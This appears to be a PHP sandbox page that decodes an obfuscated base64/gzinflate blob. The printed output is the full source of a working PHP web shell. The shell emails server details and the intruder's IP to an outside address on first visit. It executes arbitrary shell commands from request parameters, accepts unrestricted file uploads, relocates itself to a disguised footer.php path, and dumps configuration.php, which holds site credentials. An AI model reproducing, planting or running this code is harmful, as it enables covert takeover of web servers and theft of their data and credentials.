<?php
var_dump(gzinflate(base64_decode('rVZtT+M4EP58SPwH46uUVAsJe6eTVkDRchCOSgflmrJfAEVu4rZekjiyHdge4r/fjJ30ZWE5drUV
osm8PvPMeFyulFSJ4pVURpRTf7e7v7khJsTfElpz43eSOIrj/uDi2huzz+zOu+12f3nc3OjcCy1M
KuvSkB7ZBafOAx/DIzoMP0XDa3o2Gl0mZ4N4RG9RLcrPa+ph9M9VFI+Sq2HfGYxlNgcLyjJG5qyc
EvDgqSE3JYZGf4pmmk14sZtxMP0oSpFMAaWHwqSQGfcW+BeGXfLY0TytlTBzCB8fnUbJ+eAkggCD
01O6/7S5wXPNX7G6ACObmquKqx5knEltxvOSFdxfVOS57+To5GQINDU18zsjFQT5ltMwOh+MohWn
goncpzkrU17eBQXLmdEfpygNUlnQbUItU3SbnjEtcvIntoWVZGZMtReGLVfAWlvOTdm/JDFX9xyB
NFXclASkfUuxVCBusVKL/Fnbmy4vyXpm8e6dZUlM/HZ0/opG116ay5Lj2ODUaFmrlK/OgRcfD/uX
o+S0/3d0cXQeeXYWMq6NIL2l1cng+Oo8uhglw8Fg5N0GNBQFm3IdaoAs4HsiZYb/DFdBNatwVBR3
XLuk28RF7boqfuIc7b1pjvbcHIFROpOEHhhhcn74SRwpskPiGc/zg9DJDsbqEPE3hhMJZ0yLf3nv
N5LKHJr16wf7AcNDGiyyBfQgHC+cOyBMauh1j/o0gOISEAAjxgr9bkC7b81xBQ4AvxZZz0Yq5vAI
ERYpAkqmS+X0a+UqrDflw7ZBQoqNTGrbxO56mEldpkbIklQPkIzgaKUPmTtmKYrcIHbqnjZKVVL7
qN/2Qs/OoVVtoS7npVV1d96jQnFTq5KgJADjtqePK3I75I38pRQ3N9+TA6y/naRJhJR5QJkqSIFb
BJi+xLVKmOWgR+nh64Qey6JgZdYSeCDKqjbEzCveo4Z/MZQgxz2aFhld18b1uBBLvYtDyT3La/t+
B/YhIjv09teRcmiQDVHUuREVU8ba7WTMsBZ5Ww5W8z8lXFW5ZBk5FTm3ZYRo/ayamcgyXjZotcO+
ZjAB/0aNs4mvtMn5wUV7FcUFf7Dee2QVxEp8ZNN5v/+jyVPyB3ygJM2Z1j3D1hwcyEZHx2bBrSt4
jd6VzYqMXXvOud2ttfXIBC75ankGtjoWR+vTwAGnR6uwuxiXb3zttZR4t2BnjewcFvKeJy46zxI0
8F90MUWVODfYtQs0gU3TgPkpobBat0faqYDLkWe4F56IW8FkTR/Xacq1JgZEwdfhYHntXRK6T57s
aXtGcjP0LctwRixljbLI7IXVrLVK8dUJ+r2doF37gWWtcc8n/AtPfYxkt5obohB96dpqWb9GiyUE
2WBYKn4UgvwuDGrSQlATAIDNSuzNAt5ws2i4aIIQ/uB9Iqa1YnjI7W3cbQGC5+qvCPIDqL1ck52c
eS8C/w8=')));
- Output for 4.3.0 - 4.3.11, 4.4.0 - 4.4.9, 5.0.0 - 5.0.5, 5.1.0 - 5.1.6, 5.2.0 - 5.2.17, 5.3.0 - 5.3.29, 5.4.0 - 5.4.45, 5.5.0 - 5.5.38, 5.6.0 - 5.6.40, 7.0.0 - 7.0.33, 7.1.0 - 7.1.33, 7.2.0 - 7.2.33, 7.3.0 - 7.3.33, 7.4.0 - 7.4.33, 8.0.0 - 8.0.30, 8.1.0 - 8.1.28, 8.2.0 - 8.2.18, 8.3.0 - 8.3.6
- string(2768) "error_reporting(0);
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject \n$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("lancenk.malats@gmail.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/images/stories/food/footer.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>ViAr - Shell</title><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\\')){
if($u!=strlen($cwd)-1){
return $cwd.'\\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :P "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
}
elseif(isset($_GET['rf'])){
$rf = file_get_contents("../../configuration.php");
echo $rf;
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}"
preferences:
358.33 ms | 413 KiB | 460 Q